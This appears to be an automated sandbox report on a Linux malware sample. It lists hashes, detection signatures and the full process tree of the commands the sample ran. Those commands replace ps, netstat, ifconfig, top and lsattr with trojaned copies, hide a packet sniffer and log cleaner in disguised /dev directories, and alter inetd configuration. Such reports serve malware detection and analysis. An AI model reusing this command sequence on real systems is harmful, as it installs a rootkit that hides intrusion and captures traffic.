Analysis
- max time kernel: 2s
- max time network: 129s
- platform: ubuntu-18.04_amd64
- resource: ubuntu1804-amd64-20240508-en
- resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240508-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
- submitted: 21/10/2024, 05:39
Tasks
- Static task: static1
- Behavioral task: behavioral1
  Sample: 65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118
  Resource: ubuntu1804-amd64-20240508-en
- Behavioral task: behavioral2
  Sample: 65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118
  Resource: debian9-armhf-20240611-en
- Behavioral task: behavioral3
  Sample: 65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118
  Resource: debian9-mipsbe-20240729-en
- Behavioral task: behavioral4
  Sample: 65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118
  Resource: debian9-mipsel-20240418-en
General
- Target: 65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118
- Size: 7KB
- MD5: 65ae1a65bae6f9b863a267a1b4c5c504
- SHA1: ae499c63c577d711443006769bff6f4ba2e16223
- SHA256: 522a265328fefca0a92ab30be590802539eb625b536931fe3be5f1e816276954
- SHA512: 9bafd52bae1d04dd2172aa8c9a1a2e231f33dace2c639034c76c8c46add067e462134f1caf48c8ff84be3b6ec7f386d1e9e1e28dd0a98ecf86cd9a294cd7ec0f
- SSDEEP: 96:BvKkP1ISsoGmiSVSoSdS9SqnU5vKkP1ISsoGmiSVSoSdS9SqnUd:BvKGISsoDAV4YqU5vKGISsoDAV4YqUd
Signatures

- Enumerates running processes
  Discovers information about currently running processes on the system.

- Virtualization/Sandbox Evasion: Time Based Evasion (1 TTPs, 2 IoCs)
  Adversaries may detect and evade virtualized environments and sandboxes.
  pid   Process
  1549  uptime
  1602  uptime

- Checks CPU configuration (1 TTPs, 8 IoCs)
  Checks CPU information which indicates whether the system is a virtual machine.
  description              ioc            Process
  File opened for reading  /proc/cpuinfo  cat
  File opened for reading  /proc/cpuinfo  cat
  File opened for reading  /proc/cpuinfo  cat
  File opened for reading  /proc/cpuinfo  cat
  File opened for reading  /proc/cpuinfo  cat
  File opened for reading  /proc/cpuinfo  cat
  File opened for reading  /proc/cpuinfo  cat
  File opened for reading  /proc/cpuinfo  cat

- Reads CPU attributes (1 TTPs, 2 IoCs)
  description              ioc                             Process
  File opened for reading  /sys/devices/system/cpu/online  uptime
  File opened for reading  /sys/devices/system/cpu/online  uptime

- Reads runtime system information
  description              ioc                 Process
  File opened for reading  /proc/16/stat       killall
  File opened for reading  /proc/1/stat        killall
  File opened for reading  /proc/15/cmdline    killall
  File opened for reading  /proc/161/stat      killall
  File opened for reading  /proc/245/stat      killall
  File opened for reading  /proc/1063/stat     killall
  File opened for reading  /proc/1121/cmdline  killall
  File opened for reading  /proc/filesystems   mv
  File opened for reading  /proc/164/stat      killall
  File opened for reading  /proc/filesystems   cp
  File opened for reading  /proc/172/stat      killall
  File opened for reading  /proc/1121/stat     killall
  File opened for reading  /proc/14/stat       killall
  File opened for reading  /proc/997/cmdline   killall
  File opened for reading  /proc/1140/stat     killall
  File opened for reading  /proc/1177/stat     killall
  File opened for reading  /proc/526/stat      killall
  File opened for reading  /proc/1163/stat     killall
  File opened for reading  /proc/1259/cmdline  killall
  File opened for reading  /proc/3/stat        killall
  File opened for reading  /proc/526/stat      killall
  File opened for reading  /proc/1142/stat     killall
  File opened for reading  /proc/1317/stat     killall
  File opened for reading  /proc/663/cmdline   killall
  File opened for reading  /proc/22/stat       killall
  File opened for reading  /proc/1171/stat     killall
  File opened for reading  /proc/filesystems   killall
  File opened for reading  /proc/36/stat       killall
  File opened for reading  /proc/79/cmdline    killall
  File opened for reading  /proc/1059/stat     killall
  File opened for reading  /proc/610/stat      killall
  File opened for reading  /proc/1180/stat     killall
  File opened for reading  /proc/36/cmdline    killall
  File opened for reading  /proc/650/stat      killall
  File opened for reading  /proc/27/stat       killall
  File opened for reading  /proc/414/stat      killall
  File opened for reading  /proc/431/cmdline   killall
  File opened for reading  /proc/1101/cmdline  killall
  File opened for reading  /proc/428/stat      killall
  File opened for reading  /proc/1135/cmdline  killall
  File opened for reading  /proc/1258/stat     killall
  File opened for reading  /proc/438/stat      killall
  File opened for reading  /proc/485/stat      killall
  File opened for reading  /proc/333/stat      killall
  File opened for reading  /proc/9/stat        killall
  File opened for reading  /proc/10/stat       killall
  File opened for reading  /proc/24/stat       killall
  File opened for reading  /proc/17/stat       killall
  File opened for reading  /proc/761/stat      killall
  File opened for reading  /proc/1502/stat     killall
  File opened for reading  /proc/80/stat       killall
  File opened for reading  /proc/115/stat      killall
  File opened for reading  /proc/1086/stat     killall
  File opened for reading  /proc/166/stat      killall
  File opened for reading  /proc/115/stat      killall
  File opened for reading  /proc/165/stat      killall
  File opened for reading  /proc/525/stat      killall
  File opened for reading  /proc/35/stat       killall
  File opened for reading  /proc/1240/stat     killall
  File opened for reading  /proc/1379/stat     killall
  File opened for reading  /proc/1073/cmdline  killall
  File opened for reading  /proc/1316/stat     killall
  File opened for reading  /proc/1342/cmdline  killall
  File opened for reading  /proc/325/cmdline   killall

- System Network Configuration Discovery (1 TTPs, 8 IoCs)
  Adversaries may gather information about the network configuration of a system.
  pid   Process
  1617  grep
  1511  rm
  1512  mv
  1544  ifconfig
  1561  grep
  1570  rm
  1571  mv
  1600  ifconfig

- Writes file to tmp directory (1 IoCs)
  Malware often drops required files in the /tmp directory.
  description                   ioc            Process
  File opened for modification  /tmp/computer  65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118
Processes

Each entry lists the executable path, the PID, the command line as recorded by the sandbox, and any signatures that matched that process in square brackets. All child processes were spawned by the sample at depth 2.

- /tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118 (PID 1508): /tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118 [Writes file to tmp directory]
  - /usr/bin/clear (PID 1509): clear
  - /bin/chown (PID 1510): chown root.root 65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118 config-err-ESwDdV netplan_1iwncm7z snap-private-tmp ssh-GMXqXanC5C0k systemd-private-1020e78908244756830a6344ed1599c8-ModemManager.service-zJco20 systemd-private-1020e78908244756830a6344ed1599c8-bolt.service-lYyowF systemd-private-1020e78908244756830a6344ed1599c8-colord.service-J3gw7N systemd-private-1020e78908244756830a6344ed1599c8-systemd-resolved.service-9XdSFd systemd-private-1020e78908244756830a6344ed1599c8-systemd-timedated.service-hjXspn
  - /bin/rm (PID 1511): rm -rf /sbin/ifconfig [System Network Configuration Discovery]
  - /bin/mv (PID 1512): mv ifconfig /sbin/ifconfig [System Network Configuration Discovery]
  - /bin/rm (PID 1513): rm -rf /bin/netstat
  - /bin/mv (PID 1514): mv netstat /bin/netstat
  - /bin/rm (PID 1515): rm -rf /bin/ps
  - /bin/mv (PID 1516): mv ps /bin/ps
  - /bin/rm (PID 1517): rm -rf /usr/bin/top
  - /bin/mv (PID 1518): mv top /usr/bin/top
  - /bin/cp (PID 1519): cp -f mkxfs /usr/sbin/
  - /usr/bin/touch (PID 1520): touch /dev/rpm
  - /usr/bin/touch (PID 1521): touch /dev/last
  - /bin/mkdir (PID 1522): mkdir -p /dev/ida/.drag-on
  - /bin/mkdir (PID 1523): mkdir -p "/dev/ida/.. "
  - /bin/cp (PID 1524): cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/
  - /bin/cp (PID 1525): cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed "/dev/ida/.. " [Reads runtime system information]
  - /bin/rm (PID 1526): rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed
  - /usr/bin/touch (PID 1527): touch /dev/ida/.drag-on/tcp.log
  - /usr/bin/touch (PID 1528): touch "/dev/ida/.. /tcp.log"
  - /bin/cp (PID 1529): cp -f inetd.conf /etc
  - /bin/cp (PID 1530): cp -f services /etc
  - /usr/bin/killall (PID 1531): killall -HUP inetd [Reads runtime system information]
  - /bin/rm (PID 1532): rm -rf /usr/bin/lsattr
  - /bin/cp (PID 1533): cp -f lsattr /usr/bin/
  - /bin/chmod (PID 1534): chmod 500 /usr/bin/lsattr
  - /usr/bin/chattr (PID 1535): chattr +i /usr/bin/lsattr
  - /usr/bin/lsattr (PID 1536): /usr/bin/lsattr
  - /bin/sleep (PID 1537): sleep 1
  - /bin/uname (PID 1541): uname -a
  - /bin/hostname (PID 1542): hostname -f
  - /sbin/ifconfig (PID 1544): /sbin/ifconfig [System Network Configuration Discovery]
  - /bin/grep (PID 1545): grep inet
  - /usr/bin/uptime (PID 1549): uptime [Virtualization/Sandbox Evasion: Time Based Evasion; Reads CPU attributes]
  - /bin/grep (PID 1552): grep vendor_id
  - /bin/cat (PID 1551): cat /proc/cpuinfo [Checks CPU configuration]
  - /bin/grep (PID 1555): grep model
  - /bin/cat (PID 1554): cat /proc/cpuinfo [Checks CPU configuration]
  - /bin/grep (PID 1558): grep MHz
  - /bin/cat (PID 1557): cat /proc/cpuinfo [Checks CPU configuration]
  - /bin/grep (PID 1561): grep bogomips [System Network Configuration Discovery]
  - /bin/cat (PID 1560): cat /proc/cpuinfo [Checks CPU configuration]
  - /bin/df (PID 1562): df -h
  - /bin/cat (PID 1563): cat computer
  - /bin/cat (PID 1565): cat computer
  - /bin/rm (PID 1567): rm -rf last lk.tgz computer lk.tar.gz
  - /usr/bin/clear (PID 1568): clear
  - /bin/chown (PID 1569): chown root.root bin boot dev etc home initrd.img initrd.img.old lib lib64 lost+found media mnt opt proc root run sbin snap srv swapfile sys tmp usr var vmlinuz vmlinuz.old
  - /bin/rm (PID 1570): rm -rf /sbin/ifconfig [System Network Configuration Discovery]
  - /bin/mv (PID 1571): mv ifconfig /sbin/ifconfig [Reads runtime system information; System Network Configuration Discovery]
  - /bin/rm (PID 1572): rm -rf /bin/netstat
  - /bin/mv (PID 1573): mv netstat /bin/netstat
  - /bin/rm (PID 1574): rm -rf /bin/ps
  - /bin/mv (PID 1575): mv ps /bin/ps
  - /bin/rm (PID 1576): rm -rf /usr/bin/top
  - /bin/mv (PID 1577): mv top /usr/bin/top
  - /bin/cp (PID 1578): cp -f mkxfs /usr/sbin/
  - /usr/bin/touch (PID 1579): touch /dev/rpm
  - /usr/bin/touch (PID 1580): touch /dev/last
  - /bin/mkdir (PID 1581): mkdir -p /dev/ida/.drag-on
  - /bin/mkdir (PID 1582): mkdir -p "/dev/ida/.. "
  - /bin/cp (PID 1583): cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/
  - /bin/cp (PID 1584): cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed "/dev/ida/.. "
  - /bin/rm (PID 1585): rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed
  - /usr/bin/touch (PID 1586): touch /dev/ida/.drag-on/tcp.log
  - /usr/bin/touch (PID 1587): touch "/dev/ida/.. /tcp.log"
  - /bin/cp (PID 1588): cp -f inetd.conf /etc
  - /bin/cp (PID 1589): cp -f services /etc
  - /usr/bin/killall (PID 1590): killall -HUP inetd [Reads runtime system information]
  - /bin/rm (PID 1591): rm -rf /usr/bin/lsattr
  - /bin/cp (PID 1592): cp -f lsattr /usr/bin/
  - /bin/chmod (PID 1593): chmod 500 /usr/bin/lsattr
  - /usr/bin/chattr (PID 1594): chattr +i /usr/bin/lsattr
  - /usr/bin/lsattr (PID 1595): /usr/bin/lsattr
  - /bin/sleep (PID 1596): sleep 1
  - /bin/uname (PID 1597): uname -a
  - /bin/hostname (PID 1598): hostname -f
  - /bin/grep (PID 1601): grep inet
  - /sbin/ifconfig (PID 1600): /sbin/ifconfig [System Network Configuration Discovery]
  - /usr/bin/uptime (PID 1602): uptime [Virtualization/Sandbox Evasion: Time Based Evasion; Reads CPU attributes]
  - /bin/grep (PID 1608): grep vendor_id
  - /bin/cat (PID 1607): cat /proc/cpuinfo [Checks CPU configuration]
  - /bin/grep (PID 1611): grep model
  - /bin/cat (PID 1610): cat /proc/cpuinfo [Checks CPU configuration]
  - /bin/grep (PID 1614): grep MHz
  - /bin/cat (PID 1613): cat /proc/cpuinfo [Checks CPU configuration]
  - /bin/grep (PID 1617): grep bogomips [System Network Configuration Discovery]
  - /bin/cat (PID 1616): cat /proc/cpuinfo [Checks CPU configuration]
  - /bin/df (PID 1618): df -h
  - /bin/cat (PID 1619): cat computer
  - /bin/cat (PID 1621): cat computer
  - /bin/rm (PID 1623): rm -rf last lk.tgz computer lk.tar.gz
Downloads